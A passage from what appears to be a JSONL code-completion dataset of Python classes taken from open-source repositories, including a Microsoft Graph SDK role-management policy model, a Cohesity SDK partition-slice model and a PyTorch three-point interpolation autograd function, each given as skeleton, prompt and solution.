1.748189e-08, 1.5676112e-09], [4.1531862e-08, 4.1531862e-08, 8.9591637e-08, 2.8731334e-08, 5.3441389e-09, 1.5676112e-09], [8.571111e-10, 8.571111e-10, 8.571111e-10, 8.571111e-10, 2.1291666e-09, 2.4547223e-10]], dtype=np.float32)\n orogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n self.assertArrayAlmostEqual(orogenh.data, expected_data)\n self.assertAlmostEqual(self.plugin.grid_spacing_km, 1.0)\n", "source": "the_stack_v2_python_sparse", "source_path": "improver_tests/orographic_enhancement/test_OrographicEnhancement.py", "source_repo": "metoppv/improver", "split": "test", "star_events_count": 101} {"blob_id": "c07a401830d632ef7bafa71e103416f0a42c3819", "bodies": ["if not parse_node:\n raise TypeError('parse_node cannot be null.')\nreturn UnifiedRoleManagementPolicy()", "from .entity import Entity\nfrom .identity import Identity\nfrom .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\nfrom .entity import Entity\nfrom .identity import Identity\nfrom .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\nfields: Dict[str, Callable[[Any], None]] = {'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'effectiveRules': lambda n: setattr(self, 'effective_rules', n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'isOrganizationDefault': lambda n: setattr(self, 'is_organization_default', n.get_bool_value()), 'lastModifiedBy': lambda n: setattr(self, 'last_modified_by', n.get_object_value(Identity)), 'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'rules': lambda n: setattr(self, 'rules', n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'scopeId': lambda n: setattr(self, 'scope_id', n.get_str_value()), 'scopeType': lambda n: setattr(self, 'scope_type', n.get_str_value())}\nsuper_fields = super().get_field_deserializers()\nfields.update(super_fields)\nreturn fields", "if not writer:\n raise TypeError('writer cannot be null.')\nsuper().serialize(writer)\nwriter.write_str_value('description', self.description)\nwriter.write_str_value('displayName', self.display_name)\nwriter.write_collection_of_object_values('effectiveRules', self.effective_rules)\nwriter.write_bool_value('isOrganizationDefault', self.is_organization_default)\nwriter.write_object_value('lastModifiedBy', self.last_modified_by)\nwriter.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\nwriter.write_collection_of_object_values('rules', self.rules)\nwriter.write_str_value('scopeId', self.scope_id)\nwriter.write_str_value('scopeType', self.scope_type)"], "bodies_text": "<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return UnifiedRoleManagementPolicy()\n<|end_body_0|>\n\n<|body_start_1|>\n from .entity import Entity\n from .identity import Identity\n from .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\n from .entity import Entity\n from .identity import Identity\n from .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\n fields: Dict[str, Callable[[Any], None]] = {'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'effectiveRules': lambda n: setattr(self, 'effective_rules', 
n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'isOrganizationDefault': lambda n: setattr(self, 'is_organization_default', n.get_bool_value()), 'lastModifiedBy': lambda n: setattr(self, 'last_modified_by', n.get_object_value(Identity)), 'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'rules': lambda n: setattr(self, 'rules', n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'scopeId': lambda n: setattr(self, 'scope_id', n.get_str_value()), 'scopeType': lambda n: setattr(self, 'scope_type', n.get_str_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('description', self.description)\n writer.write_str_value('displayName', self.display_name)\n writer.write_collection_of_object_values('effectiveRules', self.effective_rules)\n writer.write_bool_value('isOrganizationDefault', self.is_organization_default)\n writer.write_object_value('lastModifiedBy', self.last_modified_by)\n writer.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\n writer.write_collection_of_object_values('rules', self.rules)\n writer.write_str_value('scopeId', self.scope_id)\n writer.write_str_value('scopeType', self.scope_type)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "UnifiedRoleManagementPolicy", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UnifiedRoleManagementPolicy:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> UnifiedRoleManagementPolicy:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: UnifiedRoleManagementPolicy\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return UnifiedRoleManagementPolicy()\n<|end_body_0|>\n\n<|body_start_1|>\n from .entity import Entity\n from .identity import Identity\n from .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\n from .entity import Entity\n from .identity import Identity\n from .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\n fields: Dict[str, Callable[[Any], None]] = {'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'effectiveRules': lambda n: setattr(self, 'effective_rules', n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'isOrganizationDefault': lambda n: setattr(self, 'is_organization_default', n.get_bool_value()), 'lastModifiedBy': lambda n: setattr(self, 'last_modified_by', n.get_object_value(Identity)), 'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'rules': lambda n: setattr(self, 'rules', 
n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'scopeId': lambda n: setattr(self, 'scope_id', n.get_str_value()), 'scopeType': lambda n: setattr(self, 'scope_type', n.get_str_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('description', self.description)\n writer.write_str_value('displayName', self.display_name)\n writer.write_collection_of_object_values('effectiveRules', self.effective_rules)\n writer.write_bool_value('isOrganizationDefault', self.is_organization_default)\n writer.write_object_value('lastModifiedBy', self.last_modified_by)\n writer.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\n writer.write_collection_of_object_values('rules', self.rules)\n writer.write_str_value('scopeId', self.scope_id)\n writer.write_str_value('scopeType', self.scope_type)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000237", "length_bytes": 5220, "license_type": "permissive", "methods": [{"docstring": "Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: UnifiedRoleManagementPolicy", "name": "create_from_discriminator_value", "signature": "def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> UnifiedRoleManagementPolicy"}, {"docstring": "The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]", "name": "get_field_deserializers", "signature": "def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]"}, {"docstring": "Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "name": "serialize", "signature": "def serialize(self, writer: SerializationWriter) -> None"}], "n_methods": 3, "prompt": "Implement the Python class `UnifiedRoleManagementPolicy` described below.\n\nClass description:\nImplement the UnifiedRoleManagementPolicy class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> UnifiedRoleManagementPolicy: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: UnifiedRoleManagementPolicy\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "prompted_full_text": "Implement the Python class `UnifiedRoleManagementPolicy` described below.\n\nClass description:\nImplement the UnifiedRoleManagementPolicy class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> UnifiedRoleManagementPolicy: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: UnifiedRoleManagementPolicy\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current 
model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model\n\n<|skeleton|>\nclass UnifiedRoleManagementPolicy:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> UnifiedRoleManagementPolicy:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: UnifiedRoleManagementPolicy\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return UnifiedRoleManagementPolicy()\n<|end_body_0|>\n\n<|body_start_1|>\n from .entity import Entity\n from .identity import Identity\n from .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\n from .entity import Entity\n from .identity import Identity\n from .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\n fields: Dict[str, Callable[[Any], None]] = {'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'effectiveRules': lambda n: setattr(self, 'effective_rules', n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'isOrganizationDefault': lambda n: setattr(self, 'is_organization_default', n.get_bool_value()), 'lastModifiedBy': lambda n: setattr(self, 'last_modified_by', n.get_object_value(Identity)), 'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'rules': lambda n: setattr(self, 'rules', n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'scopeId': lambda n: setattr(self, 'scope_id', n.get_str_value()), 'scopeType': lambda n: setattr(self, 'scope_type', n.get_str_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('description', self.description)\n writer.write_str_value('displayName', self.display_name)\n writer.write_collection_of_object_values('effectiveRules', self.effective_rules)\n writer.write_bool_value('isOrganizationDefault', self.is_organization_default)\n writer.write_object_value('lastModifiedBy', self.last_modified_by)\n writer.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\n writer.write_collection_of_object_values('rules', self.rules)\n writer.write_str_value('scopeId', self.scope_id)\n writer.write_str_value('scopeType', self.scope_type)\n<|end_body_2|>\n", "revision_id": "27de7ccbe688d7614b2f6bde0fdbcda4bc5cc949", "skeleton": "<|skeleton|>\nclass UnifiedRoleManagementPolicy:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> UnifiedRoleManagementPolicy:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse 
node to use to read the discriminator value and create the object Returns: UnifiedRoleManagementPolicy\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UnifiedRoleManagementPolicy:\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> UnifiedRoleManagementPolicy:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: UnifiedRoleManagementPolicy\"\"\"\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return UnifiedRoleManagementPolicy()\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n from .entity import Entity\n from .identity import Identity\n from .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\n from .entity import Entity\n from .identity import Identity\n from .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\n fields: Dict[str, Callable[[Any], None]] = {'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'effectiveRules': lambda n: setattr(self, 'effective_rules', n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'isOrganizationDefault': lambda n: setattr(self, 'is_organization_default', n.get_bool_value()), 'lastModifiedBy': lambda n: setattr(self, 'last_modified_by', n.get_object_value(Identity)), 'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'rules': lambda n: setattr(self, 'rules', n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'scopeId': lambda n: setattr(self, 'scope_id', n.get_str_value()), 'scopeType': lambda n: setattr(self, 'scope_type', n.get_str_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('description', self.description)\n writer.write_str_value('displayName', self.display_name)\n writer.write_collection_of_object_values('effectiveRules', self.effective_rules)\n writer.write_bool_value('isOrganizationDefault', self.is_organization_default)\n writer.write_object_value('lastModifiedBy', self.last_modified_by)\n writer.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\n writer.write_collection_of_object_values('rules', self.rules)\n writer.write_str_value('scopeId', self.scope_id)\n writer.write_str_value('scopeType', self.scope_type)\n", "source": "the_stack_v2_python_sparse", "source_path": 
"msgraph/generated/models/unified_role_management_policy.py", "source_repo": "microsoftgraph/msgraph-sdk-python", "split": "test", "star_events_count": 135} {"blob_id": "c22612ba9a20e5bf9210ea82855f030e48f166bf", "bodies": ["self.disk_file_name = disk_file_name\nself.length = length\nself.lvm_data_offset = lvm_data_offset\nself.offset = offset\nself.partition_number = partition_number", "if dictionary is None:\n return None\ndisk_file_name = dictionary.get('diskFileName')\nlength = dictionary.get('length')\nlvm_data_offset = dictionary.get('lvmDataOffset')\noffset = dictionary.get('offset')\npartition_number = dictionary.get('partitionNumber')\nreturn cls(disk_file_name, length, lvm_data_offset, offset, partition_number)"], "bodies_text": "<|body_start_0|>\n self.disk_file_name = disk_file_name\n self.length = length\n self.lvm_data_offset = lvm_data_offset\n self.offset = offset\n self.partition_number = partition_number\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n disk_file_name = dictionary.get('diskFileName')\n length = dictionary.get('length')\n lvm_data_offset = dictionary.get('lvmDataOffset')\n offset = dictionary.get('offset')\n partition_number = dictionary.get('partitionNumber')\n return cls(disk_file_name, length, lvm_data_offset, offset, partition_number)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'DeviceTree_PartitionSlice' model. TODO: type description here. Attributes: disk_file_name (string): The disk to use. length (long|int): The length of data for the LVM volume (for which this device tree is being built) in bytes. It does not include size of the LVM meta data. lvm_data_offset (long|int): Each LVM partition starts with LVM meta data. After the meta data there can be data for one or more LVM volumes. This field indicates the offset in bytes (relative to partition) where data for various LVM volumes starts on the partition. NOTE: If this device tree represents first LVM volume on the partition, 'lvm_data_offset' is equal to 'offset'. offset (long|int): This", "class_name": "DeviceTree_PartitionSlice", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DeviceTree_PartitionSlice:\n \"\"\"Implementation of the 'DeviceTree_PartitionSlice' model. TODO: type description here. Attributes: disk_file_name (string): The disk to use. length (long|int): The length of data for the LVM volume (for which this device tree is being built) in bytes. It does not include size of the LVM meta data. lvm_data_offset (long|int): Each LVM partition starts with LVM meta data. After the meta data there can be data for one or more LVM volumes. This field indicates the offset in bytes (relative to partition) where data for various LVM volumes starts on the partition. NOTE: If this device tree represents first LVM volume on the partition, 'lvm_data_offset' is equal to 'offset'. offset (long|int): This\"\"\"\n\n def __init__(self, disk_file_name=None, length=None, lvm_data_offset=None, offset=None, partition_number=None):\n \"\"\"Constructor for the DeviceTree_PartitionSlice class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.disk_file_name = disk_file_name\n self.length = length\n self.lvm_data_offset = lvm_data_offset\n self.offset = offset\n self.partition_number = partition_number\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n disk_file_name = dictionary.get('diskFileName')\n length = dictionary.get('length')\n lvm_data_offset = dictionary.get('lvmDataOffset')\n offset = dictionary.get('offset')\n partition_number = dictionary.get('partitionNumber')\n return cls(disk_file_name, length, lvm_data_offset, offset, partition_number)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000238", "length_bytes": 3020, "license_type": "permissive", "methods": [{"docstring": "Constructor for the DeviceTree_PartitionSlice class", "name": "__init__", "signature": "def __init__(self, disk_file_name=None, length=None, lvm_data_offset=None, offset=None, partition_number=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `DeviceTree_PartitionSlice` described below.\n\nClass description:\nImplementation of the 'DeviceTree_PartitionSlice' model. TODO: type description here. Attributes: disk_file_name (string): The disk to use. length (long|int): The length of data for the LVM volume (for which this device tree is being built) in bytes. It does not include size of the LVM meta data. lvm_data_offset (long|int): Each LVM partition starts with LVM meta data. After the meta data there can be data for one or more LVM volumes. This field indicates the offset in bytes (relative to partition) where data for various LVM volumes starts on the partition. NOTE: If this device tree represents first LVM volume on the partition, 'lvm_data_offset' is equal to 'offset'. offset (long|int): This\n\nMethod signatures and docstrings:\n- def __init__(self, disk_file_name=None, length=None, lvm_data_offset=None, offset=None, partition_number=None): Constructor for the DeviceTree_PartitionSlice class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `DeviceTree_PartitionSlice` described below.\n\nClass description:\nImplementation of the 'DeviceTree_PartitionSlice' model. TODO: type description here. Attributes: disk_file_name (string): The disk to use. length (long|int): The length of data for the LVM volume (for which this device tree is being built) in bytes. It does not include size of the LVM meta data. lvm_data_offset (long|int): Each LVM partition starts with LVM meta data. After the meta data there can be data for one or more LVM volumes. This field indicates the offset in bytes (relative to partition) where data for various LVM volumes starts on the partition. 
NOTE: If this device tree represents first LVM volume on the partition, 'lvm_data_offset' is equal to 'offset'. offset (long|int): This\n\nMethod signatures and docstrings:\n- def __init__(self, disk_file_name=None, length=None, lvm_data_offset=None, offset=None, partition_number=None): Constructor for the DeviceTree_PartitionSlice class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass DeviceTree_PartitionSlice:\n \"\"\"Implementation of the 'DeviceTree_PartitionSlice' model. TODO: type description here. Attributes: disk_file_name (string): The disk to use. length (long|int): The length of data for the LVM volume (for which this device tree is being built) in bytes. It does not include size of the LVM meta data. lvm_data_offset (long|int): Each LVM partition starts with LVM meta data. After the meta data there can be data for one or more LVM volumes. This field indicates the offset in bytes (relative to partition) where data for various LVM volumes starts on the partition. NOTE: If this device tree represents first LVM volume on the partition, 'lvm_data_offset' is equal to 'offset'. offset (long|int): This\"\"\"\n\n def __init__(self, disk_file_name=None, length=None, lvm_data_offset=None, offset=None, partition_number=None):\n \"\"\"Constructor for the DeviceTree_PartitionSlice class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.disk_file_name = disk_file_name\n self.length = length\n self.lvm_data_offset = lvm_data_offset\n self.offset = offset\n self.partition_number = partition_number\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n disk_file_name = dictionary.get('diskFileName')\n length = dictionary.get('length')\n lvm_data_offset = dictionary.get('lvmDataOffset')\n offset = dictionary.get('offset')\n partition_number = dictionary.get('partitionNumber')\n return cls(disk_file_name, length, lvm_data_offset, offset, partition_number)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass DeviceTree_PartitionSlice:\n \"\"\"Implementation of the 'DeviceTree_PartitionSlice' model. TODO: type description here. Attributes: disk_file_name (string): The disk to use. length (long|int): The length of data for the LVM volume (for which this device tree is being built) in bytes. It does not include size of the LVM meta data. lvm_data_offset (long|int): Each LVM partition starts with LVM meta data. After the meta data there can be data for one or more LVM volumes. This field indicates the offset in bytes (relative to partition) where data for various LVM volumes starts on the partition. NOTE: If this device tree represents first LVM volume on the partition, 'lvm_data_offset' is equal to 'offset'. 
offset (long|int): This\"\"\"\n\n def __init__(self, disk_file_name=None, length=None, lvm_data_offset=None, offset=None, partition_number=None):\n \"\"\"Constructor for the DeviceTree_PartitionSlice class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DeviceTree_PartitionSlice:\n \"\"\"Implementation of the 'DeviceTree_PartitionSlice' model. TODO: type description here. Attributes: disk_file_name (string): The disk to use. length (long|int): The length of data for the LVM volume (for which this device tree is being built) in bytes. It does not include size of the LVM meta data. lvm_data_offset (long|int): Each LVM partition starts with LVM meta data. After the meta data there can be data for one or more LVM volumes. This field indicates the offset in bytes (relative to partition) where data for various LVM volumes starts on the partition. NOTE: If this device tree represents first LVM volume on the partition, 'lvm_data_offset' is equal to 'offset'. offset (long|int): This\"\"\"\n\n def __init__(self, disk_file_name=None, length=None, lvm_data_offset=None, offset=None, partition_number=None):\n \"\"\"Constructor for the DeviceTree_PartitionSlice class\"\"\"\n self.disk_file_name = disk_file_name\n self.length = length\n self.lvm_data_offset = lvm_data_offset\n self.offset = offset\n self.partition_number = partition_number\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n disk_file_name = dictionary.get('diskFileName')\n length = dictionary.get('length')\n lvm_data_offset = dictionary.get('lvmDataOffset')\n offset = dictionary.get('offset')\n partition_number = dictionary.get('partitionNumber')\n return cls(disk_file_name, length, lvm_data_offset, offset, partition_number)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/device_tree_partition_slice.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "9fb86ebe3ca0bc2e40dc831f0a0507f6da6702e6", "bodies": ["B, c, m = features.size()\nn = idx.size(1)\nctx.three_interpolate_for_backward = (idx, weight, m)\nreturn _ext.three_interpolate(features, idx, weight)", "idx, weight, m = ctx.three_interpolate_for_backward\ngrad_features = _ext.three_interpolate_grad(grad_out.contiguous(), idx, weight, m)\nreturn (grad_features, None, None)"], "bodies_text": "<|body_start_0|>\n B, c, m = features.size()\n n = idx.size(1)\n ctx.three_interpolate_for_backward = (idx, weight, m)\n return _ext.three_interpolate(features, idx, weight)\n<|end_body_0|>\n\n<|body_start_1|>\n idx, weight, m = ctx.three_interpolate_for_backward\n grad_features = _ext.three_interpolate_grad(grad_out.contiguous(), idx, weight, m)\n return (grad_features, None, None)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "ThreeInterpolate", "detected_licenses": ["Unlicense"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ThreeInterpolate:\n\n def forward(ctx, features, idx, weight):\n \"\"\"Performs weighted linear interpolation on 3 features Parameters ---------- features : torch.Tensor (B, c, m) Features descriptors to be interpolated from idx : torch.Tensor (B, n, 3) three nearest neighbors of the target features in features weight : torch.Tensor (B, n, 3) weights Returns ------- torch.Tensor (B, c, n) tensor of the interpolated features\"\"\"\n <|body_0|>\n\n def backward(ctx, grad_out):\n \"\"\"Parameters ---------- grad_out : torch.Tensor (B, c, n) tensor with gradients of outputs Returns ------- grad_features : torch.Tensor (B, c, m) tensor with gradients of features None None\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n B, c, m = features.size()\n n = idx.size(1)\n ctx.three_interpolate_for_backward = (idx, weight, m)\n return _ext.three_interpolate(features, idx, weight)\n<|end_body_0|>\n\n<|body_start_1|>\n idx, weight, m = ctx.three_interpolate_for_backward\n grad_features = _ext.three_interpolate_grad(grad_out.contiguous(), idx, weight, m)\n return (grad_features, None, None)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000239", "length_bytes": 15763, "license_type": "permissive", "methods": [{"docstring": "Performs weighted linear interpolation on 3 features Parameters ---------- features : torch.Tensor (B, c, m) Features descriptors to be interpolated from idx : torch.Tensor (B, n, 3) three nearest neighbors of the target features in features weight : torch.Tensor (B, n, 3) weights Returns ------- torch.Tensor (B, c, n) tensor of the interpolated features", "name": "forward", "signature": "def forward(ctx, features, idx, weight)"}, {"docstring": "Parameters ---------- grad_out : torch.Tensor (B, c, n) tensor with gradients of outputs Returns ------- grad_features : torch.Tensor (B, c, m) tensor with gradients of features None None", "name": "backward", "signature": "def 
backward(ctx, grad_out)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001108", "prompt": "Implement the Python class `ThreeInterpolate` described below.\n\nClass description:\nImplement the ThreeInterpolate class.\n\nMethod signatures and docstrings:\n- def forward(ctx, features, idx, weight): Performs weighted linear interpolation on 3 features Parameters ---------- features : torch.Tensor (B, c, m) Features descriptors to be interpolated from idx : torch.Tensor (B, n, 3) three nearest neighbors of the target features in features weight : torch.Tensor (B, n, 3) weights Returns ------- torch.Tensor (B, c, n) tensor of the interpolated features\n- def backward(ctx, grad_out): Parameters ---------- grad_out : torch.Tensor (B, c, n) tensor with gradients of outputs Returns ------- grad_features : torch.Tensor (B, c, m) tensor with gradients of features None None", "prompted_full_text": "Implement the Python class `ThreeInterpolate` described below.\n\nClass description:\nImplement the ThreeInterpolate class.\n\nMethod signatures and docstrings:\n- def forward(ctx, features, idx, weight): Performs weighted linear interpolation on 3 features Parameters ---------- features : torch.Tensor (B, c, m) Features descriptors to be interpolated from idx : torch.Tensor (B, n, 3) three nearest neighbors of the target features in features weight : torch.Tensor (B, n, 3) weights Returns ------- torch.Tensor (B, c, n) tensor of the interpolated features\n- def backward(ctx, grad_out): Parameters ---------- grad_out : torch.Tensor (B, c, n) tensor with gradients of outputs Returns ------- grad_features : torch.Tensor (B, c, m) tensor with gradients of features None None\n\n<|skeleton|>\nclass ThreeInterpolate:\n\n def forward(ctx, features, idx, weight):\n \"\"\"Performs weighted linear interpolation on 3 features Parameters ---------- features : torch.Tensor (B, c, m) Features descriptors to be interpolated from idx : torch.Tensor (B, n, 3) three nearest neighbors of the target features in features weight : torch.Tensor (B, n, 3) weights Returns ------- torch.Tensor (B, c, n) tensor of the interpolated features\"\"\"\n <|body_0|>\n\n def backward(ctx, grad_out):\n \"\"\"Parameters ---------- grad_out : torch.Tensor (B, c, n) tensor with gradients of outputs Returns ------- grad_features : torch.Tensor (B, c, m) tensor with gradients of features None None\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n B, c, m = features.size()\n n = idx.size(1)\n ctx.three_interpolate_for_backward = (idx, weight, 